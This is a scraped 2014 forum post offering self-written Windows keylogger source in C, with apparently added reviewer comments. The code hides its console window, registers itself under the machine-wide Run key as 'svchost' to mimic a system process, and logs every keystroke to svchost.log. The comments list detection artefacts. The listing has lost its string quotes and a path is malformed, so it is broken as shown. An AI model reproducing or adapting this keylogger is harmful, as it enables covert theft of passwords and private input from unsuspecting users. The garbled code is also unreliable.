Enjoy with this steal key logger code that I wrote. #include - TopicsExpress



          

Enjoy with this steal key logger code that I wrote.
/*
 * Reviewer summary: a Windows console program that hides its own window,
 * registers a value under the machine-wide Run key, then polls the keyboard
 * state in an endless loop and appends what it sees to a log file.
 *
 * NOTE(review): the string and character literals in this listing carry no
 * quotes (ConsoleWindowClass, svchost.log, a+, [SHIFT], ...). They were
 * presumably lost when the page was extracted; the listing is reproduced
 * exactly as it appears.
 *
 * Artefacts named in the listing that a defender can look for:
 *   - a value named svchost under
 *     HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 *   - an executable named svchost.exe at a location other than the System32
 *     directory, which is where the genuine Windows svchost.exe lives
 *   - a file named svchost.log, opened by relative path and in append mode,
 *     that grows while the user types
 *   - a process that hides its console window and calls GetAsyncKeyState
 *     over the whole key range without pause
 */
#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);

/*
 * Entry point: hide the console window, make sure the Run-key value exists,
 * then hand over to the capture loop. The return value is whatever
 * get_keys() returns.
 */
int main(void)
{
    HWND stealth; /*creating stealth (window is not visible)*/
    /* A console is allocated, its window is looked up by class name and
       ShowWindow is called with 0 (the hide command), so the process shows
       no window of its own. */
    AllocConsole();
    stealth=FindWindowA(ConsoleWindowClass,NULL);
    ShowWindow(stealth,0);
    int test,create;
    test=test_key();/*check if key is available for opening*/
    /* test_key() returns 2 when the svchost value could not be read, so the
       value is only written when it is not already present. */
    if (test==2)/*create key*/
    {
        char *path=c:\\%windir%\\svchost.exe;/*the path in which the file needs to be*/
        create=create_key(path);
    }
    int t=get_keys();
    return t;
}

/*
 * Capture loop. Runs forever: after each sleep it walks the virtual-key codes
 * 8 through 222 and, for every code whose GetAsyncKeyState result equals
 * -32767, opens the log file in append mode, writes one entry and closes the
 * file again.
 *
 * Returns 1 if the log file cannot be opened. The loop has no other exit.
 *
 * Detection note: the log file is opened and closed once per recorded key,
 * so file-system telemetry shows a steady stream of small appends to
 * svchost.log from this process. Whether a given endpoint product also flags
 * the GetAsyncKeyState polling itself depends on the product (to be
 * confirmed per environment).
 */
int get_keys(void)
{
    short character;
    while(1)
    {
        sleep(10);/*to prevent 100% cpu usage*/
        for(character=8;character<=222;character++)
        {
            if(GetAsyncKeyState(character)==-32767)
            {
                FILE *file;
                /* Relative path: the file is created in whatever the current
                   directory of the process is. */
                file=fopen(svchost.log,a+);
                if(file==NULL)
                {
                    return 1;
                }
                if(file!=NULL)
                {
                    /* Codes 39 to 64 are written to the log unchanged. */
                    if((character>=39)&&(character<=64))
                    {
                        fputc(character,file);
                        fclose(file);
                        break;
                    }
                    /* Codes 65 to 90 are shifted by 32, so letters are logged
                       in lower case. */
                    else if((character>64)&&(character<91))
                    {
                        character+=32;
                        fputc(character,file);
                        fclose(file);
                        break;
                    }
                    /* Everything else is logged as a bracketed label, or
                       ignored by the default case. */
                    else
                    {
                        switch(character)
                        {
                            case VK_SPACE: fputc( ,file); fclose(file); break;
                            case VK_SHIFT: fputs([SHIFT],file); fclose(file); break;
                            case VK_RETURN: fputs(\n[ENTER],file); fclose(file); break;
                            case VK_BACK: fputs([BACKSPACE],file); fclose(file); break;
                            case VK_TAB: fputs([TAB],file); fclose(file); break;
                            case VK_CONTROL: fputs([CTRL],file); fclose(file); break;
                            case VK_DELETE: fputs([DEL],file); fclose(file); break;
                            case VK_OEM_1: fputs([;:],file); fclose(file); break;
                            case VK_OEM_2: fputs([/?],file); fclose(file); break;
                            case VK_OEM_3: fputs([`~],file); fclose(file); break;
                            case VK_OEM_4: fputs([ [{ ],file); fclose(file); break;
                            case VK_OEM_5: fputs([\\|],file); fclose(file); break;
                            case VK_OEM_6: fputs([ ]} ],file); fclose(file); break;
                            case VK_OEM_7: fputs([\],file); fclose(file); break;
                            /*case VK_OEM_PLUS: fputc(+,file); fclose(file); break;
                            case VK_OEM_COMMA: fputc(,,file); fclose(file); break;
                            case VK_OEM_MINUS: fputc(-,file); fclose(file); break;
                            case VK_OEM_PERIOD: fputc(.,file); fclose(file); break;*/
                            case VK_NUMPAD0: fputc(0,file); fclose(file); break;
                            case VK_NUMPAD1: fputc(1,file); fclose(file); break;
                            case VK_NUMPAD2: fputc(2,file); fclose(file); break;
                            case VK_NUMPAD3: fputc(3,file); fclose(file); break;
                            case VK_NUMPAD4: fputc(4,file); fclose(file); break;
                            case VK_NUMPAD5: fputc(5,file); fclose(file); break;
                            case VK_NUMPAD6: fputc(6,file); fclose(file); break;
                            case VK_NUMPAD7: fputc(7,file); fclose(file); break;
                            case VK_NUMPAD8: fputc(8,file); fclose(file); break;
                            case VK_NUMPAD9: fputc(9,file); fclose(file); break;
                            case VK_CAPITAL: fputs([CAPS LOCK],file); fclose(file); break;
                            default: fclose(file); break;
                        }
                    }
                }
            }
        }
    }
    return EXIT_SUCCESS;
}

/*
 * Checks whether the Run-key value named svchost is already present.
 *
 * Returns 1 if the Run key cannot be opened for querying,
 *         2 if the value query fails,
 *         0 if the value query succeeds.
 */
int test_key(void)
{
    int check;
    HKEY hKey;
    char path[BUFSIZE];
    DWORD buf_length=BUFSIZE;
    int reg_key;
    reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run,0,KEY_QUERY_VALUE,&hKey);
    if(reg_key!=0)
    {
        check=1;
        return check;
    }
    reg_key=RegQueryValueEx(hKey,svchost,NULL,NULL,(LPBYTE)path,&buf_length);
    if((reg_key!=0)||(buf_length>BUFSIZE))
        check=2;
    if(reg_key==0)
        check=0;
    RegCloseKey(hKey);
    return check;
}

/*
 * Persistence step: creates or opens the machine-wide Run key and stores
 * path as a REG_SZ value named svchost, which makes Windows start that
 * program at logon.
 *
 * Returns 0 if the key was created or opened, 1 otherwise.
 *
 * Mitigation and detection note: writing under HKEY_LOCAL_MACHINE normally
 * requires administrative rights, so this step returns 1 for a standard
 * user account. The write itself is visible in registry value-set telemetry
 * (for example Sysmon event ID 13) as a new value under the Run key whose
 * name imitates a Windows system process.
 */
int create_key(char *path)
{
    int reg_key,check;
    HKEY hkey;
    reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run,&hkey);
    if(reg_key==0)
    {
        RegSetValueEx((HKEY)hkey,svchost,0,REG_SZ,(BYTE *)path,strlen(path));
        check=0;
        return check;
    }
    if(reg_key!=0)
        check=1;
    return check;
}
Posted on: Wed, 13 Aug 2014 10:11:34 +0000
